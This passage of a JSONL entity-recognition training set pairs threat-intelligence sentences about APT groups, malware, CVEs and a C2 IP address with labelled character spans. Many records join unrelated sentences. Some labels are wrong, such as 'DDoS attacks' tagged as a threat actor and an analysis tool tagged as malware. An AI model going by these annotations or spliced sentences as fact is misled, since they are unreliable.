A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus . We also spotted several typical FIN7 targets , such as retailers and hotels . Most do n’t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": {"ORGANIZATION: employees": [[295, 304]], "ORGANIZATION: financial entities": [[310, 328]], "THREAT_ACTOR: FIN7": [[432, 436]]}, "info": {"id": "cyberner_stix_train_006827", "source": "cyberner_stix_train"}} {"text": "CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . The first ( port 5555 ) proxy first finds the IP parameter .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[39, 46]], "ORGANIZATION: manufacturing": [[113, 126]], "ORGANIZATION: aerospace": [[142, 151]], "ORGANIZATION: defense contractors": [[164, 183]], "ORGANIZATION: automotive": [[188, 198]], "ORGANIZATION: technology": [[201, 211]], "ORGANIZATION: energy": [[214, 220]], "ORGANIZATION: pharmaceuticals": [[227, 242]], "ORGANIZATION: education": [[247, 256]], "ORGANIZATION: legal": [[263, 268]]}, "info": {"id": "cyberner_stix_train_006828", "source": "cyberner_stix_train"}} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": {"MALWARE: malicious Word documents": [[21, 45]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "VULNERABILITY: CVE-2014-6332": [[150, 163]], "FILEPATH: thanks.pps": [[191, 201]], "FILEPATH: ins8376.exe": [[265, 276]], "TOOL: DLL": [[299, 302]], "FILEPATH: mpro324.dll": [[309, 320]]}, "info": {"id": "cyberner_stix_train_006829", "source": "cyberner_stix_train"}} {"text": "The payload features are similar to the previous versions of Seduploader .", "spans": {"MALWARE: Seduploader": [[61, 72]]}, "info": {"id": "cyberner_stix_train_006830", "source": "cyberner_stix_train"}} {"text": "This information can provide an initial means by which to assess the scope of the breach .", "spans": {}, "info": {"id": "cyberner_stix_train_006831", "source": "cyberner_stix_train"}} {"text": "At the same time , cybercriminals are reluctant to change the method of communication with the C & C server , since this would require more effort and reap less benefit than modifying the executable file . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives . Users can also adopt a multilayered security solution that can protect systems from the gateway to the endpoint , actively blocking malicious URLs by employing filtering , behavioral analysis , and custom sandboxing . 
Later in the month , Microsoft officially confirmed that numerous outages of its products were a direct result of DDoS attacks conducted by Anonymous Sudan .", "spans": {"THREAT_ACTOR: DDoS attacks": [[649, 661]], "THREAT_ACTOR: Anonymous Sudan": [[675, 690]]}, "info": {"id": "cyberner_stix_train_006832", "source": "cyberner_stix_train"}} {"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[0, 12]], "THREAT_ACTOR: group": [[39, 44]], "ORGANIZATION: Government": [[106, 116]], "ORGANIZATION: Defense": [[119, 126]], "ORGANIZATION: Research": [[129, 137]], "ORGANIZATION: Technology sectors": [[144, 162]], "ORGANIZATION: US Defense": [[217, 227]], "ORGANIZATION: satellite": [[241, 250]], "ORGANIZATION: aerospace industries": [[255, 275]], "TOOL: C&C": [[282, 285]], "IP_ADDRESS: 82.137.255.56": [[295, 308]], "THREAT_ACTOR: APT-C-27": [[351, 359]], "THREAT_ACTOR: Goldmouse": [[362, 371]]}, "info": {"id": "cyberner_stix_train_006833", "source": "cyberner_stix_train"}} {"text": "The following are IOCs related to this domain :", "spans": {"TOOL: IOCs": [[18, 22]]}, "info": {"id": "cyberner_stix_train_006834", "source": "cyberner_stix_train"}} {"text": "addWifiConfig method code fragments ‘ camera ’ – this command records a video/capture a photo using the front-facing camera when someone next unlocks the device . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . 
They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran 's national priorities .", "spans": {"THREAT_ACTOR: NewsBeef": [[213, 221]], "TOOL: JavaScript": [[369, 379]]}, "info": {"id": "cyberner_stix_train_006835", "source": "cyberner_stix_train"}} {"text": "Strazzere advises that consumers should look at the pedigree of mobile manufacturers and take a close look at their security track record before making a decision on what device to buy . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Unknown .", "spans": {"MALWARE: VBA2Graph": [[210, 219]]}, "info": {"id": "cyberner_stix_train_006836", "source": "cyberner_stix_train"}} {"text": "Our data shows , on average , about three requests per hour to the drop host . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies . OceanLotus : SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} 11b4 . In the UK , Vice Society accounts for a staggering proportion of known ransomware attacks on education — almost 70 % .", "spans": {"ORGANIZATION: businesses": [[145, 155]], "ORGANIZATION: companies": [[223, 232]], "THREAT_ACTOR: OceanLotus": [[257, 267]], "THREAT_ACTOR: Vice Society": [[351, 363]], "ORGANIZATION: education": [[432, 441]]}, "info": {"id": "cyberner_stix_train_006837", "source": "cyberner_stix_train"}} {"text": "Typical web servers and applications only require GET , POST , and HEAD .", "spans": {"TOOL: web servers": [[8, 19]]}, "info": {"id": "cyberner_stix_train_006838", "source": "cyberner_stix_train"}} {"text": "The average user might not have the necessary skills to distinguish legitimate sites from malicious ones . 
This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 .", "spans": {"ORGANIZATION: Ecuadorean military": [[167, 186]], "THREAT_ACTOR: Machete": [[239, 246]], "THREAT_ACTOR: APT38": [[263, 268]], "ORGANIZATION: financial institutions": [[319, 341]]}, "info": {"id": "cyberner_stix_train_006839", "source": "cyberner_stix_train"}} {"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {"THREAT_ACTOR: OilRig": [[65, 71]], "MALWARE: Clayslide delivery documents": [[79, 107]]}, "info": {"id": "cyberner_stix_train_006840", "source": "cyberner_stix_train"}} {"text": "This will take the user through several steps until it collects all the necessary credit card information , which will be checked online and exfiltrated to the C2 . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host . 
In the early part of 2017 , Group123 started the \" Evil New Year \" campaign .", "spans": {"ORGANIZATION: X-Force IRIS": [[165, 177]], "MALWARE: More_eggs backdoor": [[198, 216]], "THREAT_ACTOR: Group123": [[444, 452]]}, "info": {"id": "cyberner_stix_train_006841", "source": "cyberner_stix_train"}} {"text": "Decoy documents – This campaign used PowerShell to download benign documents from the Internet and launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity .", "spans": {"TOOL: Decoy documents": [[0, 15]], "TOOL: PowerShell": [[37, 47]], "ORGANIZATION: Microsoft": [[125, 134]]}, "info": {"id": "cyberner_stix_train_006842", "source": "cyberner_stix_train"}} {"text": "Even threats like DNS cache poisoning employ social engineering , so users should also be more prudent against suspicious or unknown messages that have telltale signs of malware . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . The underlying hypothesis is that themalware itself may be shared ( or sold ) across a small group of actors .", "spans": {"VULNERABILITY: CVE-2017-0144": [[280, 293]], "VULNERABILITY: CVE-2017-0145": [[298, 311]]}, "info": {"id": "cyberner_stix_train_006843", "source": "cyberner_stix_train"}} {"text": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . 
they have been last known to employ malware in February 2016 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: employees": [[36, 45]], "ORGANIZATION: aviation industry": [[72, 89]]}, "info": {"id": "cyberner_stix_train_006844", "source": "cyberner_stix_train"}} {"text": "The application recording is implemented via two methods : Using the Android MediaRecorder class to capture a video of the screen when the targeted application is presented to the user Using the accessibility service to save a text file containing the data of all the objects on the screen Both files are later sent to the C & C server of the attacker . First , the attacker’s mission is to disrupt an operational process rather than steal data . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers .", "spans": {"SYSTEM: Android": [[69, 76]], "THREAT_ACTOR: attacker’s": [[366, 376]], "ORGANIZATION: Symantec": [[447, 455]], "MALWARE: Remsec modules": [[489, 503]], "THREAT_ACTOR: Strider": [[560, 567]]}, "info": {"id": "cyberner_stix_train_006845", "source": "cyberner_stix_train"}} {"text": "Check Point reached out to Google on September 10 , 2015 , and the app containing the malware was removed from Google Play on September 15 , 2015 . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . 
These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[27, 33]], "SYSTEM: Google Play": [[111, 122]], "THREAT_ACTOR: Pitty Tiger group": [[188, 205]], "MALWARE: Microsoft Office Word document": [[234, 264]], "VULNERABILITY: CVE-2012-0158": [[307, 320]], "THREAT_ACTOR: APT10": [[423, 428]], "ORGANIZATION: businesses": [[565, 575]], "ORGANIZATION: companies": [[643, 652]]}, "info": {"id": "cyberner_stix_train_006846", "source": "cyberner_stix_train"}} {"text": "Aside from the use of the custom trojan CapturaTela , the actor makes extensive use of several other remote access Trojans to perform its malicious activities . Silence try to apply new techniques and ACTs of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": {"TOOL: CapturaTela": [[40, 51]], "TOOL: remote access Trojans": [[101, 122]]}, "info": {"id": "cyberner_stix_train_006847", "source": "cyberner_stix_train"}} {"text": "This version brings back the ACCESS_SUPERUSER and READ_FRAME_BUFFER permissions . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant . On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry . 
Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": {"TOOL: Green Lambert": [[191, 204]], "TOOL: Blue": [[239, 243]], "TOOL: email": [[306, 311]], "ORGANIZATION: Taiwanese government": [[322, 342]], "THREAT_ACTOR: Sandworm Team": [[354, 367]], "SYSTEM: SSH server.[34": [[425, 439]], "THREAT_ACTOR: Silence": [[442, 449]], "THREAT_ACTOR: StrongPity": [[539, 549]], "SYSTEM: HTTPS": [[559, 564]], "SYSTEM: C2 communication.[36": [[583, 603]], "MALWARE: SUGARUSH": [[606, 614]], "SYSTEM: a TCP connection to its C2": [[638, 664]]}, "info": {"id": "cyberner_stix_train_006848", "source": "cyberner_stix_train"}} {"text": "Finally , the specific overlays are designed for Australian financial institutions , and Australia is one of the geographic regions that is accepted by the C2 . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs . OceanLotus : SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B} 7244 . 
As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": {"THREAT_ACTOR: APT10": [[256, 261]], "ORGANIZATION: MSPs": [[293, 297]], "THREAT_ACTOR: OceanLotus": [[300, 310]], "ORGANIZATION: State , Local , Tribal , and Tribunal ( SLTT ) governments": [[467, 525]], "THREAT_ACTOR: LockBit": [[536, 543]], "ORGANIZATION: MS - ISAC": [[555, 564]]}, "info": {"id": "cyberner_stix_train_006849", "source": "cyberner_stix_train"}} {"text": ") If the application hasn ’ t received instructions about the rules for processing incoming SMSs , it simply saves all SMSs to a local database and uploads them to the C & C . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations .", "spans": {"MALWARE: ThreeDollars delivery document": [[219, 249]], "THREAT_ACTOR: OilRig": [[287, 293]], "MALWARE: Bankshot": [[350, 358]], "ORGANIZATION: Advanced Threat Research": [[441, 465]], "ORGANIZATION: financial organizations": [[534, 557]]}, "info": {"id": "cyberner_stix_train_006850", "source": "cyberner_stix_train"}} {"text": "These apps also had a large amount of downloads between 4 and 18 million , meaning the total spread of the malware may have reached between 8.5 and 36.5 million users . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . These bytes are XOR encrypted with the byte-key 0x85 and contains a list of remote hosts where to connect . 
If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": {}, "info": {"id": "cyberner_stix_train_006851", "source": "cyberner_stix_train"}} {"text": "For example : WireLurker installed malicious apps on non-jailbroken iPhones Six different Trojan , Adware and HackTool families launched “ BackStab ” attacks to steal backup archives of iOS and BlackBerry devices The HackingTeam ’ s RCS delivered its Spyware from infected PCs and Macs to jailbroken iOS devices and BlackBerry phones Recently , we discovered another Windows Trojan we named “ DualToy ” which side loads malicious or risky apps to both Android and iOS devices via a USB connection . In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta .", "spans": {"MALWARE: WireLurker": [[14, 24]], "MALWARE: HackTool families": [[110, 127]], "SYSTEM: iOS": [[186, 189], [300, 303], [464, 467]], "SYSTEM: BlackBerry": [[194, 204], [316, 326]], "MALWARE: HackingTeam": [[217, 228]], "MALWARE: RCS": [[233, 236]], "SYSTEM: Windows": [[367, 374]], "MALWARE: DualToy": [[393, 400]], "SYSTEM: Android": [[452, 459]], "SYSTEM: USB": [[482, 485]], "ORGANIZATION: DeepSight": [[555, 564]], "THREAT_ACTOR: Buckeye": [[589, 596]], "ORGANIZATION: Sony Pictures Entertainment": [[806, 833]], "ORGANIZATION: Novetta": [[887, 894]]}, "info": {"id": "cyberner_stix_train_006852", "source": "cyberner_stix_train"}} {"text": "Using names as keywords is an identical technique to that of the data structure logic previously documented by 360 ’s blog post .", "spans": {"ORGANIZATION: 360": [[111, 114]]}, "info": {"id": "cyberner_stix_train_006853", 
"source": "cyberner_stix_train"}} {"text": "In addition to the large number of Zebrocy attacks we discovered , we also observed instances of the Sofacy group leveraging the Dynamic Data Exchange ( DDE ) exploit technique previously documented by McAfee .", "spans": {"MALWARE: Zebrocy": [[35, 42]], "THREAT_ACTOR: Sofacy": [[101, 107]], "ORGANIZATION: McAfee": [[202, 208]]}, "info": {"id": "cyberner_stix_train_006854", "source": "cyberner_stix_train"}} {"text": "They go on to discuss how Nymaim uses a static configuration to contact that domain , which will return IP ’s that go into a DGA and output the actual IP addresses needed for C2 communication .", "spans": {"MALWARE: Nymaim": [[26, 32]], "TOOL: C2": [[175, 177]]}, "info": {"id": "cyberner_stix_train_006855", "source": "cyberner_stix_train"}} {"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . We noticed that this malware will not work for Mozilla Firefox or Google Chrome since these two browsers have their own root certificates .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "ORGANIZATION: telecommunications": [[161, 179]], "ORGANIZATION: defense industries": [[184, 202]], "TOOL: Mozilla Firefox": [[252, 267]], "TOOL: Google Chrome": [[271, 284]], "TOOL: browsers": [[301, 309]]}, "info": {"id": "cyberner_stix_train_006856", "source": "cyberner_stix_train"}} {"text": "The malware creates a global event named 0x0A7F1FFAB12BB2 and drops some files under a folder located in C : \\ProgramData or in the user application data folder . Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team . The loader uses the AES128 implementation from the open-source Crypto++2 library . 
The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"THREAT_ACTOR: APT35": [[201, 206], [263, 268]], "ORGANIZATION: news organizations": [[229, 247]], "THREAT_ACTOR: Newscaster Team": [[294, 309]], "TOOL: Crypto++2 library": [[375, 392]]}, "info": {"id": "cyberner_stix_train_006857", "source": "cyberner_stix_train"}} {"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided .", "spans": {"VULNERABILITY: zero-day Adobe Flash Player exploit": [[39, 74]], "ORGANIZATION: communications": [[135, 149]], "ORGANIZATION: military": [[211, 219]]}, "info": {"id": "cyberner_stix_train_006858", "source": "cyberner_stix_train"}} {"text": "Asset file before and after decryption Once the encrypted executable is decrypted and dropped in the storage , the malware has the definitions for all the components it declared in the manifest file . This time , APT15 opted for a DNS based backdoor : RoyalDNS . The second ZIP structure contains SHIPPING_MX00034900_PL_INV_pdf.exe , which is a NanoCore . The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": {"THREAT_ACTOR: APT15": [[213, 218]], "TOOL: DNS based backdoor": [[231, 249]], "TOOL: RoyalDNS": [[252, 260]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.exe": [[297, 331]], "MALWARE: NanoCore": [[345, 353]], "MALWARE: CozyDuke": [[360, 368]], "SYSTEM: C2 server": [[437, 446]]}, "info": {"id": "cyberner_stix_train_006859", "source": "cyberner_stix_train"}} {"text": "With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . 
Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 .", "spans": {"MALWARE: SWAnalytics": [[24, 35]], "VULNERABILITY: CVE-2017-0144": [[223, 236]]}, "info": {"id": "cyberner_stix_train_006860", "source": "cyberner_stix_train"}} {"text": "Ironically the decoy document is a deceptive flyer relating to the Cyber Conflict U.S. conference .", "spans": {}, "info": {"id": "cyberner_stix_train_006862", "source": "cyberner_stix_train"}} {"text": "Through correlation of technical indicators and command and control infrastructure , FireEye assess that APT28 is probably responsible for this activity .", "spans": {"TOOL: command and control": [[48, 67]], "ORGANIZATION: FireEye": [[85, 92]], "THREAT_ACTOR: APT28": [[105, 110]]}, "info": {"id": "cyberner_stix_train_006863", "source": "cyberner_stix_train"}} {"text": "This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers , and impacts user experience by consuming their data plan resources . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan , or even drive Taiwan closer to independence . 
While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": {"VULNERABILITY: CVE-2012-0158": [[280, 293]], "TOOL: NetTraveler Trojan": [[309, 327]], "ORGANIZATION: Chinese government": [[334, 352]], "ORGANIZATION: DPP": [[386, 389]]}, "info": {"id": "cyberner_stix_train_006864", "source": "cyberner_stix_train"}} {"text": "Earlier this year , we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region . Apart from user-mode ZxShell droppers mentioned earlier , there is a file ( SHA256 : 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 ) that installs a kernel device driver called loveusd.sys . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"MALWARE: ZxShell": [[396, 403]], "FILEPATH: 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335": [[460, 524]], "FILEPATH: loveusd.sys": [[571, 582]], "TOOL: Microsoft Exchange server": [[735, 760]]}, "info": {"id": "cyberner_stix_train_006865", "source": "cyberner_stix_train"}} {"text": "Runtastic sample permission prompt Runtastic sample permission prompt Checking foreground app Marcher is one of the few Android banking Trojans to use the AndroidProcesses library , which enables the application to obtain the name of the Android package that is currently running in the foreground . 
Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": {"SYSTEM: Runtastic": [[0, 9], [35, 44]], "MALWARE: Marcher": [[94, 101]], "SYSTEM: Android": [[238, 245]], "ORGANIZATION: Kaspersky Lab": [[300, 313]], "VULNERABILITY: flash exploit": [[396, 409]], "VULNERABILITY: CVE-2015-5119": [[412, 425]], "VULNERABILITY: zero-day": [[583, 591]], "MALWARE: spyware": [[666, 673]], "THREAT_ACTOR: Gamma Group": [[725, 736]]}, "info": {"id": "cyberner_stix_train_006866", "source": "cyberner_stix_train"}} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "VULNERABILITY: exploit": [[228, 235]], "VULNERABILITY: CVE2017-11882": [[236, 249]], "TOOL: HTML Application": [[280, 296]], "TOOL: HTA": [[299, 302]], "TOOL: Visual Basic": [[329, 341]], "TOOL: VBS": [[344, 347]], "FILEPATH: mshta.exe": [[432, 441]]}, "info": {"id": "cyberner_stix_train_006867", "source": "cyberner_stix_train"}} {"text": "] qwq-japan [ . 
While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT . Alternatively, if these do exist and the lock file is older than 10 minutes, the lock file is deleted and the previously running Glimpse script is . The script contained instructions to download and execute a second stage payload .", "spans": {"THREAT_ACTOR: APT1": [[22, 26]], "TOOL: publicly available backdoors": [[54, 82]], "TOOL: Poison Ivy": [[91, 101]], "TOOL: Gh0st RAT": [[106, 115]], "MALWARE: Glimpse": [[247, 254]]}, "info": {"id": "cyberner_stix_train_006868", "source": "cyberner_stix_train"}} {"text": "Normally , this is considered a low-level alert easily defeated by security software .", "spans": {}, "info": {"id": "cyberner_stix_train_006869", "source": "cyberner_stix_train"}} {"text": "However , there is also an English version of the DEFENSOR ID app ( see Figure 3 ) besides the Portuguese one , and that app has neither geographical nor language restrictions . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . 
This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection .", "spans": {"MALWARE: DEFENSOR ID": [[50, 61]], "MALWARE: slides": [[211, 217]], "VULNERABILITY: CVE-2017-8759": [[242, 255]], "TOOL: Microsoft .NET framework": [[299, 323]], "MALWARE: RATs": [[371, 375]], "MALWARE: staging": [[380, 387]], "MALWARE: malware": [[388, 395]], "THREAT_ACTOR: Lazarus Group": [[413, 426]]}, "info": {"id": "cyberner_stix_train_006870", "source": "cyberner_stix_train"}} {"text": "This function creates an event listener for when the SWF file is successfully loaded , which will call the ‘ onload5 ’ function .", "spans": {"TOOL: SWF": [[53, 56]]}, "info": {"id": "cyberner_stix_train_006871", "source": "cyberner_stix_train"}} {"text": "However , all of those have been removed from Google Play – despite the fact that some of them didn ’ t contain any adware functionality . The samples we identified target the ATM vendor Diebold . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": {"SYSTEM: Google Play": [[46, 57]], "MALWARE: samples": [[143, 150]], "ORGANIZATION: ATM vendor Diebold": [[176, 194]], "ORGANIZATION: McAfee": [[218, 224]], "THREAT_ACTOR: HIDDEN COBRA": [[262, 274]], "ORGANIZATION: cryptocurrency": [[295, 309]], "ORGANIZATION: financial organizations": [[314, 337]]}, "info": {"id": "cyberner_stix_train_006872", "source": "cyberner_stix_train"}} {"text": "After Check Point notified Google about this threat , the apps were swiftly removed from the Play store . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike . There are 3 types of lists recognized by ZxShell : plain ip addresses , HTTP and FTP addresses . 
Cisco Secure Firewall ( formerly Next - Generation Firewall and Firepower NGFW ) appliances such as Threat Defense Virtual , Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat .", "spans": {"ORGANIZATION: Check Point": [[6, 17]], "ORGANIZATION: Google": [[27, 33]], "SYSTEM: Play store": [[93, 103]], "TOOL: Cobalt Strike": [[253, 266]], "MALWARE: ZxShell": [[310, 317]], "SYSTEM: Cisco Secure Firewall": [[366, 387]], "SYSTEM: Next - Generation Firewall and Firepower NGFW": [[399, 444]], "SYSTEM: Threat Defense Virtual": [[466, 488]]}, "info": {"id": "cyberner_stix_train_006873", "source": "cyberner_stix_train"}} {"text": "Emotet activity in 2019 included several high-volume campaigns that collectively distributed tens of millions of messages primarily targeting the manufacturing and healthcare industries . In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities .", "spans": {"ORGANIZATION: manufacturing": [[146, 159]], "ORGANIZATION: healthcare industries": [[164, 185]], "SYSTEM: Windows": [[238, 245]], "MALWARE: Octopus": [[253, 260]], "ORGANIZATION: diplomatic entities": [[281, 300]]}, "info": {"id": "cyberner_stix_train_006874", "source": "cyberner_stix_train"}} {"text": "Based on the data available to us , Operation Soft Cell has been active since at least 2012 , though some evidence suggests even earlier activity by the threat actor against telecommunications providers . 
Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"THREAT_ACTOR: threat actor": [[153, 165]], "ORGANIZATION: telecommunications providers": [[174, 202]], "ORGANIZATION: Government officials": [[205, 225]]}, "info": {"id": "cyberner_stix_train_006875", "source": "cyberner_stix_train"}} {"text": "The strings section of the app contains embedded command-and-control IP addresses , ports , and domain names in plaintext . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . According to SecureWorks , That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": {"THREAT_ACTOR: APT38": [[124, 129]], "ORGANIZATION: financial institutions": [[251, 273]], "ORGANIZATION: SecureWorks": [[373, 384]], "ORGANIZATION: Biderman": [[411, 419]], "ORGANIZATION: anti - Semitic and far - right groups": [[497, 534]]}, "info": {"id": "cyberner_stix_train_006876", "source": "cyberner_stix_train"}} {"text": "When the family ceases to exist a new one is already available to fill the void , proving that the demand for such malware is always present and that therefore Cerberus has a good chance to survive . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . 
As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"MALWARE: Cerberus": [[160, 168]], "ORGANIZATION: ESET": [[254, 258]], "MALWARE: WHITEOUT": [[410, 418]], "MALWARE: Contopee": [[425, 433]], "THREAT_ACTOR: APT38": [[460, 465]], "ORGANIZATION: bank": [[523, 527]]}, "info": {"id": "cyberner_stix_train_006877", "source": "cyberner_stix_train"}} {"text": "Once we reached the non-secured database , we were able to directly observe the app ’ s malicious behavior . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence .", "spans": {"THREAT_ACTOR: Turla": [[109, 114]], "ORGANIZATION: military": [[209, 217]], "THREAT_ACTOR: HIDDEN COBRA actors": [[220, 239]], "MALWARE: external tool": [[247, 260]], "MALWARE: dropper": [[264, 271]], "MALWARE: FALLCHILL": [[287, 296]], "MALWARE: malware": [[297, 304]]}, "info": {"id": "cyberner_stix_train_006878", "source": "cyberner_stix_train"}} {"text": "During the provisioning process , PLATINUM could select whichever username and password they wish . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": {"THREAT_ACTOR: PLATINUM": [[34, 42]], "TOOL: emails": [[173, 179]]}, "info": {"id": "cyberner_stix_train_006879", "source": "cyberner_stix_train"}} {"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering 